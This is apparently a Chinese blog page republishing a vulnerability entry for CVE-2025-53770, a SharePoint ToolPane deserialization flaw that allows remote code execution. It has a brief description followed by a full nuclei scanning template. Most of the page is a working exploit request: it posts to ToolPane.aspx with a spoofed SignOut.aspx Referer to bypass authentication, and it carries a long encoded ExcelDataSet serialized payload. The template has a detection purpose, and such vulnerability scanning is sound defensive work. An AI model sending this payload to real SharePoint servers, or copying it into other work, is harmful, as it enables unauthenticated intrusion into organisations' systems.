Microsoft SharePoint ToolPane Injection

漏洞信息

漏洞名称: Microsoft SharePoint ToolPane Injection

漏洞编号:

  • CVE: CVE-2025-53770

漏洞类型: 反序列化

漏洞等级: 严重

漏洞描述: Microsoft SharePoint Server是一款广泛使用的企业级协作平台,支持文档管理、团队协作和内容管理等功能,常见于大型组织和企业的内部部署环境中。此次发现的漏洞属于反序列化漏洞,攻击者可以通过构造恶意的序列化数据,在未经授权的情况下通过网络远程执行代码。漏洞的根源在于SharePoint Server在处理ToolPane.aspx页面的输入时,未能正确验证和过滤用户提供的数据,导致攻击者可以注入恶意的序列化对象。这种漏洞的利用不需要用户交互,攻击者可以直接通过网络发起攻击,对受影响系统造成严重影响。由于漏洞已被发现在野外被利用,且微软正在准备和测试全面的更新来修复此漏洞,因此建议用户立即采取缓解措施以保护系统免受攻击。

产品厂商: Microsoft

产品名称: SharePoint Server

来源: https://github.com/projectdiscovery/nuclei-templates/blob/a6a7392425b4654381dbe8dc63a3d1dd66f7a769/CVE-2025-53770.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

id: CVE-2025-53770

info:
  name: Microsoft SharePoint ToolPane Injection (CVE-2025-53770)
  author: Lactobasilusprotectus
  severity: critical
  description: |
    Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53770
    - https://www.cisa.gov/news-events/alerts/2025/07/20/update-microsoft-releases-guidance-exploitation-sharepoint-vulnerabilities
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770
    - https://research.eye.security/sharepoint-under-siege/
  tags: rce, xaml, sharepoint, oday, authenticated

http:
  - method: POST
    attack: pitchfork
    path:
      - "{{BaseURL}}/_layouts/13/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx"
      - "{{BaseURL}}/_layouts/14/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx"
      - "{{BaseURL}}/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx"
      - "{{BaseURL}}/_layouts/16/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx"
    headers:
      Content-Type: application/x-www-form-urlencoded
      Referer: |
        {{referer}}
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
    body: |
      MSOTlPn_Uri=https%3A%2F%2F{{Host}}%2F_controltemplates%2F15%2FAclEditor.ascx&MSOTlPn_DWP=%3C%25%40+Register+TagPrefix%3D%22Scorecard%22+Namespace%3D%22Microsoft.PerformancePoint.Scorecards%22+Assembly%3D%22Microsoft.PerformancePoint.Scorecards.Client%2C+Version%3D16.0.0.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D71e9bce111e9429c%22+%25%3E%3CScorecard%3AExcelDataSet+CompressedDataTable%3D%22H4sIAAAAAAAAC%2B1cW5PayJKe2cuJOHv2bf%2BAw68z4%2BZqNxP2RJSEJBCXbnERoBMTsUiiBY0EmJuAx%2F0lG7E%2FdPfLLDUIutv2%2BJyxd3atjqZ0qcrKyltlZpX03ffffffdf%2BOgko5%2F%2FQf8NNv71XoUvSoP18MfX9ij5Woyn70rvMrQ348v1E243ixH72ajzXo5DH98cbtxw4lXG%2B078%2Blo9s5982ZY9Iqvs6V8YZS5Lv0zAf%2B3FEz%2BaY%2FW1Nef%2B1HY9sajaPgXnJUnd3fGchh9%2Fz09%2B9M%2F4ue%2F%2Fvx2t%2Fp5xVVe7KJwtnr38qU8%2BXmH8%2FF6vfj56iqO41dx%2FtV8GVzlMpnsVb9Rl2Af6kYrH72%2Be7lZzhJoq5%2Biibecr%2BZ365%2B8efQz6v0ka718MfHfvVzNoxFdrUbrl7%2F8y4vkIGxG4SgazdYvZsNodF7vhQTwc3WVjPHdy%2FVyMzre765G6ma5ROP63BuGo%2BTxCfxDF0BoEY52nf1idP7wWGE8n3ijF9FkduN5myUokUEvw93D1Wbmzjczf%2BRfAH9%2BHOPR%2BBKT34TVZeXV6P1mNPM%2BUvNpXBbx7EgzoiT1%2BO5lIkPqPAxH3hpCuXpljGaj5cR7VZ%2Bs1v%2Be%2Fetf02LWHi23oNHqVXW2Hi1nw%2FCVtlsMiSa95XCxGC3%2FPXds0Bu5r7rVV%2FX5Sp8vo%2BEaDX58cXr2OWqQyd8V797cZbN%2BMTPMD3%2F98djXZObP45VE8sa9x1jo9HY530586vd2OVqBFkMaog51GMXz5fQzUMhn3bv8dfH10M%2B%2FLozyxV9%2FPY7pjEB%2FByX%2F9deXL9bMJPByONsTw16eS%2BfVR0Tm6pNkhqt9VA65ViJST%2BjP1VGBLjTvWeCPAUp82ZL88qd%2FgqX6j%2F%2F8%2Fq0PAxYsf5bFMPos2yPbSBAfa%2FPQ0U%2FbbNpGpUzSxQBJyV8kWJKR6wzd8GSelvP4ZgkRZGOS1BoPV%2Bp4OAtGYOJkthot10%2FalLdQ2aNZnnzcLv8EWOshWH0y5v4nWPNn2H2h2Dd3aUV%2BrGJfANEXH8FUk7L0jFK8BaaE9MjHCQa03mc%2BoBKN0Xo895swFL%2BUYTmWk2E4OYzeXqXuf6zx7ZDsDIi1%2BoiWJrr9JSgI4D8%2F2BT%2F59V6OZkFL3%2B5irX9pKIJYQkhbq9wXCs4S45YpV872yx6%2BVbotov9Ya84dfP%2BoT51tl6UPdRVpef0zcOwV9rcdqxNQy3E9XuxqmrNrFtpZb2oW3IjO%2BtXzLGrxkG3Yk9cI7xv5%2ByibZSWTq9QGtx7%2BUHHvm92BrubTiPjdEThxuoyHlX7A31P9ULbKB18dd3xDT3jWBiHEK1uxdx6hr33K6E66Pkq2o292bQigio9N0VMxXWZfncHj3p5ZvwWn9%2Bdxl92c7uV02tmaLzevlhxesXQi8L7%2BnS3QJ2gYa%2Fdbj48%2BIa9rk9Lk2Fk3%2FsYt9tv3rt5czXsVVdV3Qm9WXPh5gqlpqQX6BYHVt5e%2BRV773SyG6dvZ7xIX4G%2Blt%2Bjds260w%2B7bm4duvfZSfPgj5u9RrZ5rxUbh1bYKAdFNOExKWFpQf17sX3n5cLXjjW%2B8yN7j%2FOtG3RRI6iqFtOiRj9qQI0E85opKKYMR7WIKMJUuJga8h7RS5hcWUxNeW8u7zFdpw36LVuDiqSzJunJMDxVtTJ0AnTxa%2BidUb%2BZcXqZjZ0r7Yc5Z%2BXmvY2VK609o7QBbTOdXmnq9OK%2FA80yh0bPjBqHINuM9GnjMICcNbIKj1F5f%2BRZ6EO21pFrlPL1aXPr9pUt5Hfja9mtY9iretgkfo8hw68H%2FRbhs7FIHvrOAvLW8fvm3s35Y8DqOL1dOMi3tt5kfTvALIjz1PPuspMz35MsdXP2ftjTV8P%2BInR0M3SknGqAFzvWeu30shPomIb%2Bxl7c0CsnebTdKMyM7EucilXI6dTpV28kf66ZP5K3ms4yIvnX4uct7k9RgiOjTE3ykoQFt5jn3Fxt8S1T57paNQWrL5%2FzA0W1TrAMKT9DCWuegrXi5xWJVz0Fy5fPC%2FxACvXuKCuQj5VrQK8MyPOssWkb%2BmFYaY0H0S5UGO9Fw83p01ako05pr2SPslOVsqXvQRuL22lN4qvlRaXcsNcKvWBcHfSb8y7rTYvk56CEztit2KFHsOOGUKwuROwD%2BHRZbsYedM7Un7Ud5tP936%2B6neBKMBnnNalD0zumR5uJc1tmegqip9qx3%2BOqcaQp7JcQdW58UrvfcMiWhbtNUBBrMWtW3UCBSR7bxnjh7ZUYeM6gY%2Buq0Ry7UXHrq8rEaSt7v1cIhvhvaaVO1SBd6W7KVqbGBoIPxWoBmQ6xs2k27nInHAVJ6QT8tyAPCosU2xoez4Rl9ySZcqCyMX5TxlqKNx%2FSOiW1cDSEVe3Kysqp8rFBCggfNWuLmyzPXKkWJACfOBhTZtLffNDILztS6YYWXNwsZpz%2BmA2pInGX2si%2FTL%2BL%2BoznBjqwH8Sn8Uh68q%2FU87NDEqs%2BM0PYwnuRCFnCGfWMSamDoFkX6MqjHNQfyCQRBYyuqKkAW4FSPebC5x%2FKKlaEInUICGlWdU4sUicBc1MNBkUnJjo5W5rb1OiahlJTomsyRTU3poaLPbX1xKrizWD%2FKmJONk2dFxf3DFib07wJmGS3amrs79dUv1In2YlrYorb8znZLtShebZWE2Tv5nUlXz%2FIOsTC%2BSM4RqxhpgxuZJu5rEP4B8AlWimESzl%2BCm7NhcsS15iS7xvMpPajvneyjvaBOmZLBFSn%2BiR%2BecxPwK%2FzJH7juEz40STzGD%2B4DTGNW17XFBK7xZbmEnXcqNT2cUvJXZPe1RY8Z2kN4As%2FQom1oDonJqnjqlpTJG2NNF47reLuGO56XyrYmuVnpTfYqGpWsFJ2WtXdkQAuPW89ZRwrxM8gY3qzgSYqyrYi8dA0q7U%2FgPmecj13d4THvKO0NF1Xhk0W8N41CUDNVwaEY0cJvI7auq7fs%2F%2BpddSxVtPHmjmnMl%2FPQRZjOjcUzXD3TPeJZs0dbxzooqLS%2BVCznG2V%2Bp%2FHNH6F6%2BerAwW8ovMKt208tPVTbUfUluys%2Br7aUsfXZurZHXBBO6Lz%2Bwbr6xB1JkHENCsVyua6IB7kHrSfnenBnoY5N9yY5v%2FFtkb0Wss2tUBRSABYFcoZkrgiXfqkYszX1FGFzIoyTwU22yc2JQ6NU1YgOipZgjWKz59bYbNmEczE%2BLMvUBlk2P87iEOjQ7JAFRV2JjoEX23%2BgJ8CwVsTLLXZQfyxcCMfeofDiIkUHul%2BNWujCcsQ91DN%2BHa7S6fqgGSaB6U2VdjASWpA%2BNcrOkrp55Rfm52GYJ%2BI3UnGSZpyBnVxnbg%2FCbDaaSYaYOoR6Gcg7EDkqPS5nIv3QoVPRGZMlq%2B5HACIxvVNS5a1WJbL5P4%2BkOW1VRkJayB0q87lTVK2ktITVa4XBjVNBAOxSK5XlrzeCllmYirn4iqoh1RWg1sunZjKgXhvNR7o9GDPUTL%2FLKGwH6nLa0VGIEI1DDAVNgZqohG3boh%2BDaZLUqoa%2BAgUUWYCMSZ65i15v2SJSJTJI9BqojwFcA1DR7sAHizKG0vLUWkJ7Zqetyy9TKWdlMOkvAv0CpVTS5azWN7fCr1OZSbQLSqvLN0WhgY6m0OBuHktlDtRIXgml30quX%2F9np47sfleVDVxJ6o1USW45obK95aZIY98b5mvRQ3jCWqqqGugzI1JZTO%2BaVLZCuR1L7kfxDdtOS6jT%2BOOrBufylncwPg1sbBQQvTVWC1SqcVlVdSqiVv1%2BAhPQpk6NCF99seTshaT3KWO8q7p5lpZ1%2Bj%2BICgWj7Jzx3BW9ai1coWiCyN7GCC2Q2wyEQ%2B%2BsKUk8ZAl6lEz4%2Bar4hR%2FmVl3hhim103iwHCF2KeDf%2FjHiHNiBX50Nh72dmP2t0PyT%2FRCEvccrH4LMWA48futUOgPsGxuQ3UGUYg4q1U8q5fC%2B4gj8g1OryraFdSDjw444QgThpOzM%2F1MM%2BuRXzSz5HMdeM0QY4Q2fPsd4sCprJdN7gfA2bDH3hQxeFTaC22c8StK2%2Bk3Y8LZsZSZ02%2FddSP7QHGvl%2BsKK4fYsV8VrV4xN%2BybiEGz3F8LcDtGaQZajF2ttUfcSTQx8ezQgKsu7ZwnWujH7ekZQbhHzbEvlJqbCzfC8ENfLzUHveYceZGwA1%2F%2B2H%2FCg5YR7ilOQb6imNQvU9xK8fgTzyh2ucdYDrhXdvOIlYWEZyPPM8w0tz7aJXVtD7Fu0uct5WiYb5H%2FEEsl9C117GO%2B4pRfSmCcrp%2BLrUAP4CnjsUjfjyylAnx0d%2BYsgOsG8rDxdQfxWcgx46P6XTzvZRFT6yybRHPwIYt2hO8W%2FDQvrrVh0vegbxbxLIN8UzKWdYj%2BJT2Qm%2FB7XYGcRs7pFlme2t0W8kbK1svpyIt1BfAgGSCZOMaXkIvoGF9i3vXyzdBFfgNwOc4VeqvoUVv0Z3POQGmivzn00nQjZys0kgmmswFdmWG8RI%2BkjgV8ILdGaWpFOvULWXK2Q8hgKicSDiZE42I07PnI6ek8VqFlx4PcGHBtipOR75A0eODTALrgIC9H9yjfd1H%2F7PlTbZJ7GuDuR33lBOeJ%2BxewH%2Bk755ESPiQ5ALQDXQzkT7ocrwo7byJvBjpGu6yH%2BBR8nArNLgxydixpD3tX6a6FmhF1C6b%2FN5Qwv8CxgPkHzhFHPspeGNeY1JRQVKoCOrMQ6Bs5huBz4KMkP6LUCeBHGRkxCCRcWP6tMAZUNqg%2FJ6Z%2BGmJA%2FhLwaDEeU%2FgZVL8hbgL0X1lh3lVK5GeIcoh2U%2BClZKi%2BGysRlR2G62H%2BVO5pPnTJE9TgMweAXxkI0PogyvAPhPKGnLY7xk%2BUb%2BBTmZkGwVnDBxe%2BBbg0buoX9AFea7p%2BhIdWMkB79CPxBt3GAvqDJEjA4%2BL6dI1x0PNYKdJ4QFfYd6I%2FnAoaB43T4Ptbos%2FIIleK%2FE64VhUMETyuAz%2FgtafnGMeG4KK99qnt7W6B2mMc3H6fppuX8H0QS3oDT4bDfMd99zQO0LFB%2FQKORvXn1D%2F0P3xMV%2BXuA3xfczuim%2BQj4w98oF%2BW7Bf9gI%2B4bgBfeQ3bciA8gP86oSf4hLg0QPmof1VMsiS7sm%2FgOCZcGNYTvAFtDkeeG49pDVyLTLNExhzGmXmAa9CWSoKDMIng8H3IEtMaOEpdKqDdE2N5LJOlDuJLiU8iU0wLeMQCIQ7mcjl2yB6NR2fZ3ic0Y3weyaraPdN1O%2BEJ4CwSHj%2BSmaBKfttn6T30BrgFSi6RT8YJPlYoaSVxhl6xnqOcIP6R%2BgkcPqO%2FNY%2BxpT%2FQ8DWP3UrGXlXd7oXu1QPk0kC%2FQYDA%2F2l6lLBgQGlLhDcF8vk3BBtBGcbG8rEivrCcAM4t86crbQfgSFsWE78sshHQAZZ16Eyd6oH%2FXepnyHJUoPYTgt8gnSx3ST7zpCsNS%2BxIzpoW8IAc4fkYumV%2FYDzg84MuDUgeZtR%2FSo6YF6jffKTD2op4UBQ66RxsaKq%2BUMMKj4%2ByexW2GQ%2FjOYNrke0gOSebC3kVqv5J42d5hS2mpPKb4L7iqM7dm8zrDOa%2BTnVYng6hauv8wrPH00yhOi1j7lIUFaGAFWAnTunublex1fs5Ba1tzUK2T6naeA63dkr3%2FDKtMQWFm4qQZRlxIV9bBQrfbzgXRzGHUl1QfKFNMgyrIWFlxZ7SbWgTo40SU%2F9Y0YEBnnZvlDaV0xuyqto0c6PZGqxs1asoGY%2FalQOCofuMT4%2FWOrSbSivGQoWmlMeDirqrtspjrQRY7XbLbGrhtN1smQq1Ryx9DMornHMA3cZOH%2F5O3IHf2OqP4edKfwP58D2tRXLo1IiR80sdNwW%2BfibkepwPfeJAjLH1poih4Ncgry6S9cPQaWMNFPrLx%2B0129NU4vvb8Y0CfyAKUL4DBy08PqksSd6PrMZzz7ngBeyB9ZD%2FSx245nUSzDkdoV9TqQsd%2BQbEfJQSgt%2FE%2BRqUBl3zUc9ob65o7fEZzSon9ahX%2Fn0KOU6wkw3pJX6TkfhhsP08B0Rkk%2FlAEpHhwHzz3AEbjblxdfJleI5MDjVWaljeoK4xd%2BA5z%2BuANxMaz0Fo1xVtniMHmJsIvUDWpzmPFqtkCZ%2BmKjOtlOik%2FFuqPeIC9k8xhzB8zEEZ7ofmOnkwRg0ePOWpCE%2F2KzBengMPF%2FXP53aa63HcCtGk9oyv9NHQH8cBq3Q8INjHw3gDug6QHCb6xTS3wq%2BPKf7gg51RwEN8grnOS%2BDwHA1fi%2F0jnivhi7JcyJV2pPaIBeD%2F8TnTj%2BKaFN%2BM345PM6HPQ7yHevDTmW9P0umMPpJeNFXQoIAf5CiWvrOb%2BHGjZ3zS5%2Bj97fg%2FRgFeEJGslQu0345vFPhfSQGN1qwRIp%2F2fPWKvGcK%2BdwF5f1GSV4Re%2FpW2BOzl2Ld4n1Pqm1vKI8n85u7Uw60WxxjrYDWmKrKhKbc8g%2FitGewgRz3rj495nMpx7q0c2OcH%2FdnIS9sr4ED54LbWA%2BQeV8zaITpvXxmEaXbb3%2BhvXzt3alvrHE4EeMq95sh1057wtzKdFVNra%2F8bnsx0UT6OQNe2%2BuEqbw7YpLfrd%2BWXJiSe7qSPYnBVC6mBnKTHHIOVYrbqBqmcRzsUxkm7%2Bfsqif%2B7RbuTNsc8%2Fbgg9Ne94eQMwf75zi%2FrqXlxDbRTub3I7HvZddP5%2BMnxZMsfg3ZoD2KxoNsFLEn1g9Ba%2BwnpH1oZ%2BM535sa8prBF5MfwF57OcS00W4xmMTBcX3nPiPX8qkvVSn7vV0Ga03hLdamsDYHPtHeTyUL3VwMaC3FbmFtwt7c9qr5Zk7LDg7dHPYAHJpGN74po0myZ5X2UsBjaqfkRy66B9P5s%2FITn%2BSH9jqI5nX595Cfy%2F2CWLfZsA3EnsAz%2BD2xS7dj2%2FelZMzOfCHZyKx6n7S%2FOjzaadrTOSjrbqpdF%2BtA4ReTsS%2FHAymzbRZVizfuIhI77cmem%2FWjDPOBTQQc69Eu%2BCS8gmBPKNQpRyL8PebFT7I%2Fst3%2FA%2FtT17%2Bavp7LSpCSFT6fsnVTO9qDnIijHZR7kni%2FK%2FtoYoBMKnLD8Wl%2FfscIN167eCYTtaw%2Fx3mI%2Feuss2e2qxtmTrpqfjVdTfPjYb%2F9V5qLBqm5qJLMRdnn5iK5%2F0bORU1qr4apdyXsST20TV6XJ%2F2btfawm4d6qIyx52Dawtr2wMa%2Bi75570gcjCb1q2XPYfxd9E0cnHs7auYGu0bPyjYM7TBo8d70h7Hy2I7yJnhPKO1bS%2F0nyS35PoC0Wffs5i3O7MzluxhT2KRcOIMPpmH%2FycLJYa4IoV8RNlwxDJrqFfMI4%2FfzU1nRpE3OqGqHxwFeNlLvxWh%2BSr%2BwVgb34rR%2FpU17ZIawleTru70SzoszjHk%2B6BU3sMf0rtPMofx%2FTs842DOS2Ft6rykZK%2BV8lPqXsDWawvklnmdUi%2FlkVXhc8v0qfp9ITJnPmpyY%2BFeRqGJ5lEtNvjxkHmWyBZ46veTdmediQoY9xt6PnaSF5a%2BTfSxYTW3EJ3kBXQ17Bv8rTL1fI%2FeMTceYsyA7k%2FUJDs1VFbNYP9mpttNzjr5IfYr9Vz0z9KbhxolKz%2BKndiUNgA0NUb4YxaMOpX3u8ryMhTkmHj%2BWr8xgzY8O3lTLm8dRlx%2BYbWmfdylYUoe6LGcK1iuPsGTzsClh8fOkX%2BaZ2ZExNfOjcZK%2FEx2ef5domeIP5oEW9lV5qfeUxuPTviQng31Q2GtjtX161%2BZhX1JXP2D%2F1xr2s1ietbD%2FivbxkB9g3wwg%2Byr2uPnGeOtoHNM3nUf9aQr2eWId8m%2FnM7K5pI12KldgQAfvL%2BYqdQS4vexX8YUv5O9Euy83f01%2FSOYpLpWQZXv4CXkJQGA54%2F1patDi2P1v1S05n7RYVsraiR5yPyH2fBm4l2HZMbs0L6A9jV8NeW4YS5tXrWG%2FG9rZe5bJlnKMMSzILPmrkDWs65KcQXXioHnusyIHZIWsZmpH6pRUU0RrdPEJ%2FKtqu%2B2gZ82tGXwke%2B3XLId9r3r46W0f56WSeTbQWd%2FlOzgO%2BxwHkbKxM3szyH3LZ%2FxR4olLHVRt%2BX5cj3VhTPs42Z%2F24rlC79fRWheJoXx%2B3qbPfuj4PD6B%2FFW1ox0%2B1NSp0Y8%2Fqd6DvBkpeePfddD8oLx9y398y398Ykxr3sr3YJPS4fzzWOh%2FNFky%2BL1LkU32oZ%2FyWNAf9vukvxjep%2BeVgRwzvaslWvbn5cgu5i6pw9rZ%2FvY55p%2BZfBfkN9JV5ja%2FJl2DR3vzJ8FChhxzbBUjeyhtHwekDbjBx3nTybpR81su6xNzJ1ZUgi9tj93JV9P99%2FRbCZ9%2Fn%2F78nQxnybqEXIEf2Tf0vjR0zUzp2jKta0PZB%2B%2FB0KbmFrDDQa8QpN7VID3hfX3GSRdVF3ri9PRNNdVPam6speZG7nVrfdgX%2B4Po3deIh75sjv8y9pnx2%2FlaKl78Y6xVWA6%2F86rmzt%2FjgmzWU7pwSOuCJ%2BU1dyHrjHf14n0w8hd99hfDC1lM3rXJ0ztvmG%2FUk13upOzyiO3yQPmgXf6iawVnMvfwnuIXW6dIeFBLSmPEPvvpXbDkWzMsV8qM8zs3FvKClP9o94qglw6b0q2JLq35KHLNvC%2B%2FsyLtaPhaynPhIr%2F68K0ipQx%2BUc7FdGfNDPKP9077IhZoT427%2BDwn%2FZBbBw0gF5RnwXpBvjUGL8Oafi5DNWkQgWPhlO%2FlTJmIPjHfS%2B93rYHbtN2VH31SOwzAkvktmYMLuBvk1uVHDvhXPfG24vfCqczNmncDC%2F8B%2FmPzzsG1g2sH1w6uh7ge4nqI6%2BHFLjpVePRdKaSw%2Bb%2BjlczMm8kSm1a2b0StbJaxS1yNV%2B%2FeXiWf%2BnruC3uf9uGwt%2FLra9XkE2Cpj3qlP9H28pe3V%2BcVLz%2FM96EPor29%2Bo3ff3vqk4D4ft1ln%2FSxvHQvjz6r9%2Fbq4oN%2Fv%2FzlfwCdHyNKU1UAAA%3D%3D%22+DataTable-CaseSensitive%3D%22false%22+runat%3D%22server%22%3E+%3C%2FScorecard%3AExcelDataSet%3E
    payloads:
      referer:
        - /_layouts/SignOut.aspx
        - /_layouts/./SignOut.aspx
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "-------------------- .NET Properties --------------------"


Github Poc
#projectdiscovery/nuclei-templates:github issues #反序列化
Microsoft SharePoint ToolPane Injection
http://example.com/2025/07/24/github_1450183416/
作者
lianccc
发布于
2025年7月24日
许可协议